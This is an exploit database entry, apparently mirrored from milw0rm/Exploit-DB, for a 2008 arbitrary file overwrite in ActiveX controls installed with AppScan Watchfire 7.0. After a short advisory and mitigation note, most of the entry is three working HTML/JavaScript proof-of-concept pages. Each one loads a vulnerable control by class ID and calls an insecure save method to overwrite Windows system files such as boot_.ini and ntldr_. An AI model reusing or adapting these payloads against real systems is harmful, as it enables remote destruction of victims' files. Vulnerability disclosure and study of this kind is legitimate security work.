header-logo
Suggest Exploit
vendor:
AppScan Watchfire Web Application Security
by:
Fr33d0m & Kn0wl3dg3 1s th3 r341 P0w3r
9.3
CVSS
HIGH
Arbitrary File Overwrite
264
CWE
Product Name: AppScan Watchfire Web Application Security
Affected Version From: 7
Affected Version To: 7
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Multiple Insecure Methods in AppScan Watchfire Web Application Security v 7.0

An arbitrary file overwrite has been discovered in an ActiveX control installed with the WatchFire Appscan v 7.0. The vulnerability is caused due to the use of insecure methods in the ActiveX control. This can be exploited to overwrite arbitrary files on the affected system by a remote attacker.

Mitigation:

Update to the latest version of the AppScan Watchfire Web Application Security v 7.0
Source

Exploit-DB raw data:

****************************************************************************************************************
Multiple Insecure Methods in AppScan Watchfire Web Application Security v 7.0
Remote: Yes
An arbitrary file overwrite has been discovered in an ActiveX control installed with the WatchFire Appscan v 7.0.
by callAX -> Fr33d0m & Kn0wl3dg3 1s th3 r341 P0w3r
****************************************************************************************************************
 

<HTML>
 <object id=ctrl classid="clsid:{E302E486-D748-475C-84F3-4F7ED6F78EC5}"></object>
<SCRIPT>
function Do_it()
 {
   File = "c:\\autoexec_.bat"
   ctrl.CompactSave(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Proof of
Concept">
</BODY>
</HTML>
 
<HTML>
<BODY>
 <object id=ctrl classid="clsid:{AA9730F1-70F6-43DC-94FC-000000000004}"></object>
<SCRIPT>
function Do_it()
 {
   File = "c:\\boot_.ini"
   ctrl.saveRecordedExploreToFile(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Proof of
Concept">
</BODY>
</HTML>
 

<HTML>
<BODY>
 <object id=ctrl classid="clsid:{E302E486-D748-475C-84F3-4F7ED6F78EC5}"></object>
<SCRIPT>
function Do_it()
 {
   File = "c:\\ntldr_"
   ctrl.SaveSession(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Proof of
Concept">
</BODY>
</HTML>

# milw0rm.com [2008-04-25]